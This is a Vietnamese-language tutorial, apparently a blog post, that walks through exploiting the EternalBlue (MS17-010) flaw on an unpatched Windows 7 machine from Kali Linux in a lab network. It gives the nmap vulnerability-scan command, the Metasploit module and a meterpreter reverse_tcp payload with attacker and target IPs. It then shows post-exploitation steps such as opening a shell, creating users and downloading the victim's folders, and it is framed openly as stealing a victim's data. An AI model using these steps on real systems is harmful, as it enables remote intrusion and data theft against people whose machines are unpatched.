Ta có thể đánh cắp dữ liệu của nạn nhân từ xa một cách dễ dàng khi máy tính nạn nhân có lỗ hổng bảo mật – EternalBlue trên Windows
Mô hình:
- Máy tính của kẻ tấn công sử dụng Kali có ip: 192.168.154.129
- Máy tính của nạn nhân sử dụng Win 7có ip: 192.168.154.128
Bước 1. Ping đến máy nạn nhân. Dò quét cổng 445 xem máy nạn nhân có mở cổng 445 hay không.
Bước 2. Kiểm tra xem có khả năng khai thác nạn nhân trên cổng 445
a) Chuẩn bị scripts kiểm tra lỗ hổng: locate *nse
Kết quả
Nếu không có scripts có tên smb-vuln-ms17-010
- Download the nmap NSE script to scan for CVE-2017-0143. The file to download is https://svn.nmap.org/nmap/scripts/smb-vuln-ms17-010.nse and you should save it in the scripts subfolder of the directory in which you installed nmap.
- Run the following command to update the NSE script rule database: nmap –script-updatedb
Link: https://www.vanstechelman.eu/content/scanning-for-cve-2017-0143-eternalblue-using-nmap-ms17-010
b) Chạy scripts kiểm tra khả năng khai thác tại cổng 445
– Chạy script
nmap.exe -Pn -p445 –open –max-hostgroup 3 –script smb-vuln-ms17-010 192.168.154.128
Kết quả khi cổng 445 có thể tấn công:
Kết quả cổng 445 nhưng ko thể tấn công qua cổng này:
Bước 4. Khi biết có thể tấn công qua cổng 445: Ta sử dụng công cụ tiếp theo là metasploit
a) Bật metasploit sau đó sử dụng lệnh search + tên lỗ hổng ms17-010
b) Thực thi: sử dụng lệnh use + số thứ tự
Ngoài ra có thể gõ trực tiếp use exploit/windows/smb/ms17_010_eternalblue
Bước 5. Thiết lập ip port trước khi tấn công
a) Kiểm tra các khai báo
b) Khai báo:
– Chỉ định địa chỉ IP của mục tiêu.
RHOST: Đây chính là địa chỉ IP của máy mục tiêu.
set rhosts 192.168.154.128
Kết quả:
– Tải shell Reverse_tcp đáng tin cậy làm tải trọng .
set payload windows/x64/meterpreter/reverse_tcp
– Khai báo IP và port của máy Attacker (chính là khai báo ip của máy mà ta đang sử dụng)
set lhost 192.168.154.129
set lport 4321 nếu cần; không set thì mặc định lport là 4444
c) Kiểm tra lại kết quả sau khi khai báo
Bước 6. Tấn công
– Sử dụng lệnh run
Kết quả cuối cùng có biểu tượng WIN là ta đã kết nối thành công đến máy mục tiêu
Kết nối thành công nếu kiểm tra trên máy nạn nhân sẽ thấy có 1 phiên liên lạc đã được thiết lập
Bước 7. Tiến hành khai thác nạn nhân
Sau khi kết nối có hiện WIN. Ta có thể sử dụng các lệnh để khai thác máy tính nạn nhân
– Kiểm tra HĐH : sysinfo
– Kiểm tra ổ C
– Kiểm tra hiện tại ta đang ở thư mục nào của nạn nhân: pwd
– Để vào thẳng cmd của máy nạn nhân sử dụng: shell
– Tại đây ta có thể sử dụng các lệnh cmd để khai thác máy tính của nạn nhân. Như copy, upload, tạo người dùng mới……
Ví dụ: Tải thư mục từ máy nạn nhân về
Chúc các bạn thành công